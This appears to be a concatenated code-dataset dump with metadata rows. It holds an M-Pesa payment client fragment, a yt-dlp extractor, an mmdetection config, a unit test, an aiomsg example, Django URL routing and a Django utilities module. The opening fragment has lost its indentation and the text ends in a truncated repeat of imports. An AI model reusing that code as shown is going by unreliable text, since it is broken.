        # b64encode needs bytes under Python 3; encode the input and decode the result
        encoded = base64.b64encode(password.encode()).decode()
payload = {
"BusinessShortCode": business_shortcode,
"Password": encoded,
"Timestamp": time,
"CheckoutRequestID": checkout_request_id
}
headers = {'Authorization': 'Bearer {0}'.format(self.authentication_token), 'Content-Type': "application/json"}
if self.env == "production":
base_safaricom_url = self.live_url
else:
base_safaricom_url = self.sandbox_url
saf_url = "{0}{1}".format(base_safaricom_url, "/mpesa/stkpushquery/v1/query")
r = requests.post(saf_url, headers=headers, json=payload)
return r.json()
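# Hedged usage sketch (illustration only; the keys, shortcode and URLs below are
# placeholders/assumptions, not values supplied by this module):
if __name__ == "__main__":
    express = MpesaExpress(
        env="sandbox",
        app_key="YOUR_APP_KEY",
        app_secret="YOUR_APP_SECRET",
        sandbox_url="https://sandbox.safaricom.co.ke",
        live_url="https://api.safaricom.co.ke",
    )
    # trigger an STK push prompt on the customer's phone
    print(express.stk_push(
        business_shortcode=174379,      # assumption: commonly used sandbox shortcode
        passcode="YOUR_PASSCODE",
        amount=1,
        callback_url="https://example.com/mpesa/callback",
        reference_code="TEST-001",
        phone_number="254700000000",
        description="Test payment",
    ))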
| 57.541667 | 238 | 0.509051 | true | true |
1c4a8557b221c053d9b0aaf2d4788aa69102a5c8 | 1,269 | py | Python | yt_dlp/extractor/vidlox.py | mkg20001/yt-dlp | 9518a0a6bed040844d5fd6e29c25328e5949ce94 | [
"Unlicense"
] | 1 | 2021-08-24T17:03:03.000Z | 2021-08-24T17:03:03.000Z | yt_dlp/extractor/vidlox.py | mkg20001/yt-dlp | 9518a0a6bed040844d5fd6e29c25328e5949ce94 | [
"Unlicense"
] | null | null | null | yt_dlp/extractor/vidlox.py | mkg20001/yt-dlp | 9518a0a6bed040844d5fd6e29c25328e5949ce94 | [
"Unlicense"
] | null | null | null |
# coding: utf-8
from __future__ import unicode_literals
from .common import InfoExtractor
class VIDLOXIE(InfoExtractor):
IE_NAME = 'vidlox'
    # escape the dot before "html" so the pattern does not match arbitrary characters
    _VALID_URL = r'https?://vidlox\.me/(embed-)?(?P<id>[a-z0-9]+)\.html'
_TEST = {
'url': 'https://vidlox.me/6wq8gciafziz.html',
'info_dict': {
'id': '6wq8gciafziz',
'title': 'md5:74c82229b059846a82628e60dcc661b5',
'ext': 'mp4',
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
webpage = self._download_webpage(
'https://vidlox.me/%s.html' % video_id, video_id)
m3u8 = self._search_regex(
r'(https.+m3u8)',
webpage, 'm3u8')
title = self._search_regex(
r'<title>Watch (?P<title>.+)<\/title>',
webpage, 'title', group='title')
thumbnail = self._search_regex(
r'spriteSheetUrl = "(?P<thumbnail>https.+)"',
webpage, 'thumbnail', group='thumbnail')
formats = self._extract_m3u8_formats(m3u8, video_id, ext='mp4')
self._sort_formats(formats)
return {
'id': video_id,
'title': title,
'formats': formats,
'thumbnail': thumbnail,
}
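# Hedged usage sketch (illustrative; assumes yt-dlp is installed and the sample
# URL is still live, neither of which is guaranteed by this module):
if __name__ == '__main__':
    from yt_dlp import YoutubeDL
    with YoutubeDL({'skip_download': True}) as ydl:
        ydl.extract_info('https://vidlox.me/6wq8gciafziz.html', download=False)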
| 27.586957 | 71 | 0.547675 | true | true |
1c4a8748112916fe5593eae671d07b4837e59ab3 | 6,115 | py | Python | configs/libra_rcnn/libra_faster_rcnn_r101_fpn_1x.py | Lechatelia/own_mmdet | eac5db1d1bee8eafe0ed46fa4bb61ca8605b502f | [
"Apache-2.0"
] | 24 | 2021-10-14T03:28:28.000Z | 2022-03-29T09:30:04.000Z | configs/libra_rcnn/libra_faster_rcnn_r101_fpn_1x.py | Lechatelia/own_mmdet | eac5db1d1bee8eafe0ed46fa4bb61ca8605b502f | [
"Apache-2.0"
] | 4 | 2021-12-14T15:04:49.000Z | 2022-02-19T09:54:42.000Z | configs/libra_rcnn/libra_faster_rcnn_r101_fpn_1x.py | Lechatelia/own_mmdet | eac5db1d1bee8eafe0ed46fa4bb61ca8605b502f | [
"Apache-2.0"
] | 4 | 2021-10-31T11:23:06.000Z | 2021-12-17T06:38:50.000Z |
# model settings
model = dict(
type='FasterRCNN',
pretrained='torchvision://resnet101',
backbone=dict(
type='ResNet',
depth=101,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
style='pytorch'),
neck=[
dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
dict(
type='BFP',
in_channels=256,
num_levels=5,
refine_level=2,
refine_type='non_local')
],
rpn_head=dict(
type='RPNHead',
in_channels=256,
feat_channels=256,
anchor_scales=[8],
anchor_ratios=[0.5, 1.0, 2.0],
anchor_strides=[4, 8, 16, 32, 64],
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0],
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='SmoothL1Loss', beta=1.0 / 9.0, loss_weight=1.0)),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', out_size=7, sample_num=2),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='SharedFCBBoxHead',
num_fcs=2,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=81,
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2],
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(
type='BalancedL1Loss',
alpha=0.5,
gamma=1.5,
beta=1.0,
loss_weight=1.0)))
# model training and testing settings
train_cfg = dict(
rpn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.7,
neg_iou_thr=0.3,
min_pos_iou=0.3,
ignore_iof_thr=-1),
sampler=dict(
type='RandomSampler',
num=256,
pos_fraction=0.5,
neg_pos_ub=5,
add_gt_as_proposals=False),
allowed_border=-1,
pos_weight=-1,
debug=False),
rpn_proposal=dict(
nms_across_levels=False,
nms_pre=2000,
nms_post=2000,
max_num=2000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
assigner=dict(
type='MaxIoUAssigner',
pos_iou_thr=0.5,
neg_iou_thr=0.5,
min_pos_iou=0.5,
ignore_iof_thr=-1),
sampler=dict(
type='CombinedSampler',
num=512,
pos_fraction=0.25,
add_gt_as_proposals=True,
pos_sampler=dict(type='InstanceBalancedPosSampler'),
neg_sampler=dict(
type='IoUBalancedNegSampler',
floor_thr=-1,
floor_fraction=0,
num_bins=3)),
pos_weight=-1,
debug=False))
test_cfg = dict(
rpn=dict(
nms_across_levels=False,
nms_pre=1000,
nms_post=1000,
max_num=1000,
nms_thr=0.7,
min_bbox_size=0),
rcnn=dict(
score_thr=0.05, nms=dict(type='nms', iou_thr=0.5), max_per_img=100)
# soft-nms is also supported for rcnn testing
# e.g., nms=dict(type='soft_nms', iou_thr=0.5, min_score=0.05)
)
# dataset settings
dataset_type = 'CocoDataset'
data_root = 'data/coco/'
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='Resize', img_scale=(1333, 800), keep_ratio=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=(1333, 800),
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
imgs_per_gpu=2,
workers_per_gpu=2,
train=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_train2017.json',
img_prefix=data_root + 'train2017/',
pipeline=train_pipeline),
val=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline),
test=dict(
type=dataset_type,
ann_file=data_root + 'annotations/instances_val2017.json',
img_prefix=data_root + 'val2017/',
pipeline=test_pipeline))
evaluation = dict(interval=1, metric='bbox')
# optimizer
optimizer = dict(type='SGD', lr=0.02, momentum=0.9, weight_decay=0.0001)
optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=500,
warmup_ratio=1.0 / 3,
step=[8, 11])
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(type='TensorboardLoggerHook')
])
# yapf:enable
# runtime settings
total_epochs = 12
dist_params = dict(backend='nccl')
log_level = 'INFO'
work_dir = './work_dirs/libra_faster_rcnn_r101_fpn_1x'
load_from = None
resume_from = None
workflow = [('train', 1)]
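# Hedged usage note (not part of the original config): in mmdetection-style
# repos a config like this is consumed by the training entry point, e.g.
#   python tools/train.py configs/libra_rcnn/libra_faster_rcnn_r101_fpn_1x.py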
| 31.358974 | 79 | 0.559935 | true | true |
1c4a87f8e649f8a5932c3165dddf9b3f0aeca3cc | 880 | py | Python | mi/dataset/driver/ctdmo_ghqr/sio/test/test_ctdmo_ghqr_sio_telemetered_driver.py | cdobs/mi-instrument | 99f9322a4afabc5dff9b0fad12166075efce838c | [
"BSD-2-Clause"
] | 1 | 2018-09-14T23:28:29.000Z | 2018-09-14T23:28:29.000Z | mi/dataset/driver/ctdmo_ghqr/sio/test/test_ctdmo_ghqr_sio_telemetered_driver.py | cdobs/mi-instrument | 99f9322a4afabc5dff9b0fad12166075efce838c | [
"BSD-2-Clause"
] | 33 | 2017-04-25T19:53:45.000Z | 2022-03-18T17:42:18.000Z | mi/dataset/driver/ctdmo_ghqr/sio/test/test_ctdmo_ghqr_sio_telemetered_driver.py | cdobs/mi-instrument | 99f9322a4afabc5dff9b0fad12166075efce838c | [
"BSD-2-Clause"
] | 31 | 2015-03-04T01:01:09.000Z | 2020-10-28T14:42:12.000Z |
import os
import unittest
from mi.core.log import get_logger
from mi.dataset.dataset_driver import ParticleDataHandler
from mi.dataset.driver.ctdmo_ghqr.sio.ctdmo_ghqr_sio_telemetered_driver import parse
from mi.dataset.driver.ctdmo_ghqr.sio.resource import RESOURCE_PATH
__author__ = 'mworden'
log = get_logger()
class SampleTest(unittest.TestCase):
def test_one(self):
source_file_path = os.path.join(RESOURCE_PATH, 'node59p1_3.ctdmo.dat')
particle_data_handler = ParticleDataHandler()
particle_data_handler = parse(None, source_file_path, particle_data_handler)
log.debug("SAMPLES: %s", particle_data_handler._samples)
log.debug("FAILURE: %s", particle_data_handler._failure)
        # assertEquals is a deprecated alias of assertEqual
        self.assertEqual(particle_data_handler._failure, False)
if __name__ == '__main__':
test = SampleTest('test_one')
test.test_one()
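# Hedged note: the test can also be run via unittest discovery (assumes the
# RESOURCE_PATH data file is available locally), e.g.
#   python -m unittest mi.dataset.driver.ctdmo_ghqr.sio.test.test_ctdmo_ghqr_sio_telemetered_driver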
| 28.387097 | 84 | 0.761364 | true | true |
1c4a898f084e68f38241c7b658081be92d7a651f | 949 | py | Python | examples/01/b.py | cjrh/aiosmartsock | a4ab5ffe5b673ada2a3002d7a9cb68ee1ea4a48f | [
"Apache-2.0"
] | 9 | 2019-03-25T23:25:08.000Z | 2022-01-17T00:49:26.000Z | examples/01/b.py | cjrh/aiomsg | 74b646675e3d7296f0334d3e17c1be0370c5d852 | [
"Apache-2.0"
] | 33 | 2019-04-13T02:31:07.000Z | 2022-03-21T19:12:14.000Z | examples/01/b.py | cjrh/aiosmartsock | a4ab5ffe5b673ada2a3002d7a9cb68ee1ea4a48f | [
"Apache-2.0"
] | 1 | 2021-04-26T09:07:36.000Z | 2021-04-26T09:07:36.000Z |
import logging
import asyncio
import aiomsg
import random
from colorama import init, Fore, Style
init()
logging.basicConfig(level="DEBUG")
async def main():
s = aiomsg.Søcket()
await s.connect()
async def r():
while True:
print("waiting for response...")
msg = await s.recv_string()
print(Fore.GREEN + f"Got back {msg}" + Style.RESET_ALL)
# assert msg == 'CALEB'
t = loop.create_task(r())
try:
while True:
print("sending...")
await s.send_string(Fore.BLUE + "caleb" + Style.RESET_ALL)
await asyncio.sleep(random.randint(0, 30))
except asyncio.CancelledError:
t.cancel()
await t
if __name__ == "__main__":
loop = asyncio.get_event_loop()
m = loop.create_task(main())
try:
loop.run_forever()
except KeyboardInterrupt:
pass
m.cancel()
loop.run_until_complete(m)
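# Hedged note (assumption based on the example layout): this connect-side script
# is meant to pair with a bind-side peer, e.g. an a.py that awaits s.bind() on
# the default host/port before b.py connects.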
| 21.088889 | 70 | 0.591149 | true | true |
1c4a8a9465c9765af917e68961daf41b5e99fd15 | 1,270 | py | Python | backend/api/urls.py | ChristchurchCityWeightlifting/lifter-api | a82b79c75106e7f4f8ea4b4e3e12d727213445e3 | [
"MIT"
] | null | null | null | backend/api/urls.py | ChristchurchCityWeightlifting/lifter-api | a82b79c75106e7f4f8ea4b4e3e12d727213445e3 | [
"MIT"
] | 5 | 2022-03-07T08:30:47.000Z | 2022-03-22T09:15:52.000Z | backend/api/urls.py | ChristchurchCityWeightlifting/lifter-api | a82b79c75106e7f4f8ea4b4e3e12d727213445e3 | [
"MIT"
] | null | null | null |
from django.urls import include, path
from rest_framework.routers import DefaultRouter
from rest_framework_nested.routers import NestedDefaultRouter
from api.views import AthleteViewSet, CompetitionViewSet, LiftViewSet, SessionViewSet
router = DefaultRouter(trailing_slash=False)
router.register(r"athletes", AthleteViewSet, "athletes")
router.register(r"competitions", CompetitionViewSet, "competitions")
# /athletes/<athlete pk>
# /competitions/<competition pk>
competitions_router = NestedDefaultRouter(
router, r"competitions", lookup="competitions"
)
competitions_router.register(
r"sessions", SessionViewSet, basename="competition-sessions"
)
# /competitions/<competition pk>/session/<session number>
sessions_router = NestedDefaultRouter(
competitions_router, r"sessions", lookup="sessions"
)
sessions_router.register(r"lifts", LiftViewSet, basename="session-lifts")
# /competitions/<competition pk>/sessions/<session number>/lifts/<lift pk>
urlpatterns = [
path("auth/", include("dj_rest_auth.urls")),
# path("auth/registration/", include("dj_rest_auth.registration.urls")), # block registration for now
path("", include(router.urls)),
path("", include(competitions_router.urls)),
path("", include(sessions_router.urls)),
]
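# Note (hedged): with drf-nested-routers, lookup='competitions' exposes the URL
# kwarg 'competitions_pk' to the nested viewsets, so the session routes resolve
# as /competitions/<competitions_pk>/sessions/<pk>.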
| 36.285714 | 105 | 0.774803 | true | true |
1c4a8b2d6e2959ac7dd63a901ca4ffa691691f85 | 21,419 | py | Python | parlalize/utils.py | VesterDe/parlalize | b725fe4b55b95f2ad3505aa70dac2474269ea3da | [
"Unlicense"
] | 1 | 2021-04-19T07:30:06.000Z | 2021-04-19T07:30:06.000Z | parlalize/utils.py | VesterDe/parlalize | b725fe4b55b95f2ad3505aa70dac2474269ea3da | [
"Unlicense"
] | null | null | null | parlalize/utils.py | VesterDe/parlalize | b725fe4b55b95f2ad3505aa70dac2474269ea3da | [
"Unlicense"
] | null | null | null |
# -*- coding: UTF-8 -*-
import numpy
from datetime import datetime, timedelta
from django.http import Http404, JsonResponse, HttpResponse
import requests
from parlaposlanci.models import (Person, StyleScores, CutVotes, MPStaticPL,
MembershipsOfMember, LessEqualVoters,
EqualVoters, Presence,
AverageNumberOfSpeechesPerSession,
VocabularySize, Compass, SpokenWords,
LastActivity, MinisterStatic)
from parlaskupine.models import (Organization, WorkingBodies,
CutVotes as CutVotesPG,
DeviationInOrganization, LessMatchingThem,
MostMatchingThem, PercentOFAttendedSession,
MPOfPg, PGStatic,
VocabularySize as VocabularySizePG,
StyleScores as StyleScoresPG)
from parlaseje.models import (VoteDetailed, Session, Vote, Ballot, Speech,
PresenceOfPG, AbsentMPs, VoteDetailed)
from parlalize.settings import (VOTE_MAP, API_URL, BASE_URL, API_DATE_FORMAT,
DEBUG)
from django.contrib.contenttypes.models import ContentType
import json
import numpy as np
import time
import csv
from django.core.cache import cache
from django.core.exceptions import PermissionDenied
from parlalize.settings import SETTER_KEY
def lockSetter(function):
def wrap(request, *args, **kwargs):
if request:
setterKey = request.GET.get('key')
if str(setterKey) == str(SETTER_KEY):
return function(request, *args, **kwargs)
else:
raise PermissionDenied
else:
return function(*args, **kwargs)
return wrap
def tryHard(url):
data = None
counter = 0
while data is None:
try:
            if counter > 2:
                # NOTE: 'client' (an error-reporting client such as raven/Sentry)
                # is assumed to be configured elsewhere in the project.
                client.captureMessage(url+' je zahinavu več ko 2x.')
return
data = requests.get(url)
except:
counter += 1
time.sleep(5)
pass
return data
def normalize(val, max_):
try:
return round((float(val)*100)/float(max_))
except:
return val
# checks if a card with the given data exists or not
# DEPRECATED
def saveOrAbort(model, **kwargs):
savedModel = model.objects.filter(**kwargs)
if savedModel:
        # Add cards which always have unique data
if model != LastActivity:
lastModel = model.objects.latest('created_at')
if savedModel.latest('created_at').id != lastModel.id:
newModel = model(**kwargs)
newModel.save()
return True
else:
return False
else:
newModel = model(**kwargs)
newModel.save()
return True
return False
def saveOrAbortNew(model, **kwargs):
# checks if cards with the data exists or not NEW
"""
usage:
watch parlaposlanci/views.py:setMembershipsOfMember
if you use saveOrAbortNew in setter you need to use
getPersonCardModelNew in getter
"""
def save_it(model, created_for, **kwargs):
kwargs.update({'created_for': created_for})
newModel = model(**kwargs)
newModel.save()
return True
if model != LastActivity:
created_for = kwargs.pop('created_for')
# print kwargs
savedModel = model.objects.filter(**kwargs)
if savedModel:
if 'person' in kwargs:
if model != LastActivity:
person_id = kwargs['person'].id_parladata
cards = model.objects.filter(person__id_parladata=person_id,
created_for__lte=created_for)
if cards:
lastDate = cards.latest('created_for').created_for
else:
lastDate = datetime.min
if savedModel.latest('created_for').created_for != lastDate:
save_it(model, created_for, **kwargs)
elif 'organization' in kwargs:
party_id = kwargs['organization'].id_parladata
models = model.objects.filter(organization__id_parladata=party_id,
created_for__lte=created_for)
if models:
                # if one already exists in the DB for this PG
lastDate = models.latest('created_for').created_for
if savedModel.latest('created_for').created_for != lastDate:
save_it(model, created_for, **kwargs)
else:
save_it(model, created_for, **kwargs)
elif 'session' in kwargs:
ses_id = kwargs['session'].id_parladata
models = model.objects.filter(session__id_parladata=ses_id)
lastDate = models.latest('created_at').created_for
if savedModel.latest('created_for').created_for != lastDate:
save_it(model, created_for, **kwargs)
else:
if model != LastActivity:
kwargs.update({'created_for': created_for})
newModel = model(**kwargs)
newModel.save()
return True
return False
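# Hedged usage sketch for saveOrAbortNew (model and field names below are
# illustrative, not taken from a real call site):
# saveOrAbortNew(Presence,
#                person=Person.objects.get(id_parladata=2),
#                created_for=datetime(2017, 1, 1).date(),
#                presence=95.2)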
def findDatesFromLastCard(model, id, lastParsedDate, minDate=None):
toDate = datetime.strptime(lastParsedDate, '%d.%m.%Y').date()
print model._meta.app_label
try:
if model._meta.app_label == 'parlaposlanci':
models = model.objects.filter(person__id_parladata=id)
lastCardDate = models.order_by('-created_for')[0].created_for
elif model._meta.app_label == 'parlaskupine':
models = model.objects.filter(organization__id_parladata=id)
lastCardDate = models.order_by('-created_for')[0].created_for
elif model._meta.app_label == 'parlaseje':
models = model.objects.all()
lastCardDate = models.order_by('-created_for')[0].created_for
except:
lastCardDate = datetime.strptime('02.08.2014', '%d.%m.%Y').date()
# lastCardDate = lastCardDate.replace(tzinfo=None)
if minDate:
od = datetime.strptime(minDate, '%d.%m.%Y').date()
lastCardDate = datetime.strptime(minDate, '%d.%m.%Y').date()
if od > lastCardDate:
lastCardDate = od
return [(lastCardDate+timedelta(days=days))
for days
in range((toDate-lastCardDate).days)]
def datesGenerator(stDate, toDate):
dates = [(stDate + timedelta(days=x))
for x
in range(0, (toDate - stDate).days)]
return dates
def getPersonCardModelNew(model, id, date=None, is_visible=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(person__id_parladata=id,
created_for__lte=dateObj)
else:
modelObject = model.objects.filter(person__id_parladata=id,
created_for__lte=datetime.now())
if is_visible:
modelObject = modelObject.filter(is_visible=True)
if not modelObject:
# if model == LastActivity:
# return None
if DEBUG:
raise Http404('Nismo našli kartice' + str(model)+str(id))
else:
raise Http404('Nismo našli kartice')
else:
if model == LastActivity:
latest_day = modelObject.latest('created_for').created_for
print latest_day
if len(modelObject.filter(created_for=latest_day)) > 1:
models = modelObject.filter(created_for=latest_day)
modelObject = models.latest('created_at')
else:
modelObject = modelObject.latest('created_for')
else:
date = modelObject.latest('created_for').created_for
models = modelObject.filter(created_for=date)
modelObject = models.latest('created_at')
# modelObject = modelObject.latest('created_for')
return modelObject
# DEPRECATED
def getPersonCardModel(model, id, date=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
if model == LastActivity:
modelObject = model.objects.filter(person__id_parladata=id,
date__lte=dateObj)
else:
dateObj
modelObject = model.objects.filter(person__id_parladata=id,
created_at__lte=dateObj)
else:
if model == LastActivity:
modelObject = model.objects.filter(person__id_parladata=id,
date__lte=datetime.now())
else:
modelObject = model.objects.filter(person__id_parladata=id,
created_at__lte=datetime.now())
if not modelObject:
if model == LastActivity:
return None
raise Http404('Nismo našli kartice')
else:
if model == LastActivity:
modelObject = modelObject.latest('date')
else:
modelObject = modelObject.latest('created_at')
return modelObject
def getPGCardModel(model, id, date=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(organization__id_parladata=id,
created_at__lte=dateObj)
else:
modelObject = model.objects.filter(organization__id_parladata=id,
created_at__lte=datetime.now())
if not modelObject:
raise Http404('Nismo našli kartice')
else:
modelObject = modelObject.latest('created_at')
return modelObject
def getPGCardModelNew(model, id, date=None, is_visible=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(organization__id_parladata=id,
created_for__lte=dateObj)
else:
modelObject = model.objects.filter(organization__id_parladata=id,
created_for__lte=datetime.now())
if is_visible:
modelObject = modelObject.filter(is_visible=True)
if not modelObject:
# if model == LastActivity:
# return None
raise Http404('Nismo našli kartice')
else:
date = modelObject.latest('created_for').created_for
modelObject = modelObject.filter(created_for=date).latest('created_at')
return modelObject
def getSCardModel(model, id_se, date=None):
if date:
dateObj = datetime.strptime(date, '%d.%m.%Y')
modelObject = model.objects.filter(id_parladata=id_se,
created_at__lte=dateObj)
else:
modelObject = model.objects.filter(id_parladata=id_se,
created_at__lte=datetime.now())
if not modelObject:
raise Http404('Nismo našli kartice')
else:
modelObject = modelObject.latest('created_at')
return modelObject
# get all parliament member IDs
def getIDs():
# create persons
result = []
# getAllPeople
data = tryHard(API_URL+'/getAllPeople').json()
# data = tryHard(API_URL+'/getMPs').json()
for mp in data:
result.append(mp['id'])
return result
# get all PG IDs
def getPGIDs():
data = tryHard(API_URL+'/getAllPGsExt/').json()
return [pg for pg in data]
def getMPGovId(id_parladata):
person = Person.objects.filter(id_parladata=id_parladata)[0]
out = {'id': person.id_parladata,
'gov_id': person.gov_id}
return out
def getPersonData(id_parladata, date_=None):
if not date_:
date_ = datetime.now().strftime(API_DATE_FORMAT)
try:
data = getPersonCardModelNew(MPStaticPL, id_parladata, date_)
except:
url = API_URL + '/getPersonData/' + str(id_parladata) + '/'
guest = tryHard(url).json()
gov_id = None
if guest and guest['gov_id']:
return {
'type': 'visitor' if guest else 'unknown',
'party': {'acronym': None,
'id': None,
'name': None,
'is_coalition': None},
'name': guest['name'] if guest else None,
'gov_id': guest['gov_id'],
'id': id_parladata,
'district': None,
'gender': None,
'is_active': None,
'has_function': False,
}
else:
return {'type': 'visitor' if guest else 'unknown',
'party': {'acronym': None,
'id': None,
'name': None,
'is_coalition': None},
'name': guest['name'] if guest else None,
'gov_id': None,
'id': id_parladata,
'district': None,
'gender': None,
'is_active': None,
'has_function': False,
}
party = Organization.objects.get(id_parladata=data.party_id)
partyData = party.getOrganizationData()
return {
'type': 'mp',
'name': data.person.name,
'id': int(data.person.id_parladata),
'gov_id': data.gov_id,
'party': partyData,
'gender': data.gender,
'district': data.district,
'is_active': True if data.person.actived == 'True' else False,
'has_function': data.person.has_function,
}
def getMinistryData(id_parladata, date_=None):
if not date_:
date_ = datetime.now().strftime(API_DATE_FORMAT)
try:
data = getPersonCardModelNew(MinisterStatic, id_parladata, date_)
return {
'type': "ministry",
'name': data.person.name,
'id': int(data.person.id_parladata),
'gov_id': data.gov_id,
'party': data.party.getOrganizationData() if data.party else None,
'ministry': data.ministry.getOrganizationData() if data.ministry else None,
'gender': data.gender,
'district': data.district,
'is_active': True if data.person.actived == "True" else False,
'has_function': data.person.has_function,
}
except:
return getPersonData(id_parladata, date_)
def getPersonDataAPI(request, id_parladata, date_=None):
data = getPersonData(id_parladata, date_)
return JsonResponse(data)
def modelsData(request):
out = []
for ct in ContentType.objects.all():
m = ct.model_class()
out.append({'model': m.__module__,
'Ime modela': m.__name__,
'st:': m._default_manager.count()})
return JsonResponse(out, safe=False)
def getAllStaticData(request, force_render=False):
date_of = datetime.now().date()
date_ = date_of.strftime(API_DATE_FORMAT)
c_data = cache.get('all_statics')
if c_data and not force_render:
out = c_data
else:
PS_NP = ['poslanska skupina', 'nepovezani poslanec']
date_ = datetime.now().strftime(API_DATE_FORMAT)
out = {'persons': {}, 'partys': {}, 'wbs': {}}
for person in Person.objects.all():
personData = getPersonData(person.id_parladata,
date_)
out['persons'][person.id_parladata] = personData
parliamentary_group = Organization.objects.filter(classification__in=PS_NP)
for party in parliamentary_group:
out['partys'][party.id_parladata] = party.getOrganizationData()
working_bodies = ['odbor', 'komisija', 'preiskovalna komisija']
orgs = Organization.objects.filter(classification__in=working_bodies)
out['wbs'] = [{'id': org.id_parladata,
'name': org.name} for org in orgs]
cache.set('all_statics', out, 60 * 60 * 48)
return JsonResponse(out)
def getPersonsCardDates(request, person_id):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = ('attachment; filename="'
'' + str(person_id) + ''
'.csv"')
mems = tryHard(API_URL + '/getAllTimeMemberships').json()
member_dates = [mem for mem in mems if str(mem['id']) == person_id]
dates = {}
dates['is_member'] = []
for d in member_dates:
if d['start_time']:
start = datetime.strptime(d['start_time'].split('T')[0],
'%Y-%m-%d')
else:
start = datetime(day=1, month=8, year=2014)
if d['end_time']:
end = datetime.strptime(d['end_time'].split('T')[0],
'%Y-%m-%d')
else:
end = datetime.today()
while end > start:
dates['is_member'].append(start.strftime(API_DATE_FORMAT))
start = start+timedelta(days=1)
models = {'spoken': SpokenWords,
'presence': Presence,
'style': StyleScores,
'equal': EqualVoters,
'less_equal': LessEqualVoters,
'static': MPStaticPL,
'number_of_speeches': AverageNumberOfSpeechesPerSession,
'memberships': MembershipsOfMember,
'last_activity': LastActivity,
'vocabolary_size': VocabularySize,
}
    # .items() is required to unpack (key, model) pairs from the dict
    for key, model in models.items():
modelz = model.objects.filter(person__id_parladata=person_id)
datez = modelz.order_by('created_for').values_list('created_for',
flat=True)
dates[key] = [day.strftime(API_DATE_FORMAT) for day in datez]
writer = csv.writer(response)
keys = dates.keys()
writer.writerow(['Date']+keys)
date = datetime(day=1, month=8, year=2014)
while date < datetime.today():
print date
strDate = date.strftime(API_DATE_FORMAT)
writer.writerow([strDate]+['Yes' if strDate in dates[key] else ''
for key in keys])
date = date + timedelta(days=1)
return response
def getOrgsCardDates(request, org_id):
response = HttpResponse(content_type='text/csv')
response['Content-Disposition'] = ('attachment; filename="'
'' + str(org_id) + ''
'.csv"')
dates = {}
models = {'PGStatic': PGStatic,
'PercentOFAttendedSession': PercentOFAttendedSession,
'MPOfPg': MPOfPg,
'MostMatchingThem': MostMatchingThem,
'LessMatchingThem': LessMatchingThem,
'DeviationInOrganization': DeviationInOrganization,
'vocabulary_size': VocabularySizePG,
'style_scores': StyleScoresPG,
}
for key, model in models:
modelz = model.objects.filter(organization__id_parladata=org_id)
datez = modelz.order_by('created_for').values_list('created_for',
flat=True)
dates[key] = [day.strftime(API_DATE_FORMAT) for day in datez]
writer = csv.writer(response)
keys = dates.keys()
writer.writerow(['Date']+keys)
date = datetime(day=1, month=8, year=2014)
while date < datetime.today():
print date
strDate = date.strftime(API_DATE_FORMAT)
writer.writerow([strDate]+['Yes' if strDate in dates[key] else ''
for key in keys])
date = date + timedelta(days=1)
return response
def monitorMe(request):
r = requests.get(BASE_URL + '/p/getMPStatic/2/')
if r.status_code == 200:
return HttpResponse('All iz well.')
else:
return HttpResponse('PANIC!')
def printProgressBar(iteration,
total,
prefix='',
suffix='',
decimals=1,
length=100,
fill='█'):
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
length - Optional : character length of bar (Int)
fill - Optional : bar fill character (Str)
"""
percent = ("{0:." + str(decimals) + "f}").format(100 * (iteration / float(total)))
filledLength = int(length * iteration // total)
bar = fill * filledLength + '-' * (length - filledLength)
print('\r' + prefix + '|' + bar + '|' + percent + suffix + '\r')
# Print New Line on Complete
if iteration == total:
print()
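# Hedged demo of printProgressBar (purely illustrative; safe to run standalone):
if __name__ == '__main__':
    for i in range(101):
        printProgressBar(i, 100, prefix='Progress ', suffix=' done', length=40)
        time.sleep(0.01)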
| 36.551195 | 91 | 0.562771 | import numpy
from datetime import datetime, timedelta
from django.http import Http404, JsonResponse, HttpResponse
import requests
